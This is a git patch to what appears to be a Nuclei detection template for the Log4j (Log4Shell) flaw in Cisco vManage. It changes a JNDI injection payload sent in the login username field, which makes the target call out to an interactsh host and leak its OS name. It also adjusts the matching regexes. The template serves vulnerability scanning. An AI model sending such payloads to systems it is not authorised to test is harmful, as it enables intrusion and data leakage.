From c461bab897cc1b2935e4abfc2e799bfbc31931d8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 1 Aug 2022 11:33:08 +0530 Subject: [PATCH] Update cisco-vmanage-log4j.yaml --- vulnerabilities/cisco/cisco-vmanage-log4j.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/cisco/cisco-vmanage-log4j.yaml b/vulnerabilities/cisco/cisco-vmanage-log4j.yaml index 7fb8f0206c..20d4a611ba 100644 --- a/vulnerabilities/cisco/cisco-vmanage-log4j.yaml +++ b/vulnerabilities/cisco/cisco-vmanage-log4j.yaml @@ -25,7 +25,7 @@ requests: Origin: {{BaseURL}} Referer: {{BaseURL}} - j_username=${jndi:ldap://${hostName}.{{interactsh-url}}}&j_password=admin&submit=Log+In + j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin&submit=Log+In matchers-condition: and matchers: @@ -37,7 +37,7 @@ requests: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable extractors: - type: kval @@ -48,4 +48,4 @@ requests: part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output